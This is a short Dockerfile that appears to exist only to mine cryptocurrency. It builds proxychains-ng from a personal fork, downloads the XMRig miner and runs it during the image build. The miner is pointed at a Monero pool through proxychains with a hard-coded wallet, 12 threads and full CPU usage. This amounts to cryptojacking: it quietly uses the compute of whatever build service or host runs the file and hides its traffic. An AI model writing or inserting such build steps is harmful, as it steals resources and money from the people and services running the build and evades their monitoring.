FROM fedora:29
RUN dnf -y update
RUN yum install wget -y
RUN dnf groupinstall -y "Development Tools"
RUN dnf groupinstall -y "C Development Tools and Libraries"
RUN git clone https://github.com/whiteamelia09/proxychains-ng.git && cd proxychains-ng && ./configure && make && make install && make install-config
RUN wget https://github.com/xmrig/xmrig/releases/download/v2.8.3/xmrig-2.8.3-xenial-amd64.tar.gz && tar -xf xmrig-2.8.3-xenial-amd64.tar.gz && cd xmrig-2.8.3 && proxychains4 ./xmrig -o stratum+tcp://pool.supportxmr.com:5555 -u 45UVbdyweuJV5peeuD1ypVbFs6Z1nYhRB4r9BEL9xYjE8Ej8Pjob3LQX2dN4m314gB87Z1M9TbabwN4g4L9184dcCLyiU6y -p NvidiaGeForce2 --threads 12 --max-cpu-usage=100 --cpu-priority 5 --donate-level 1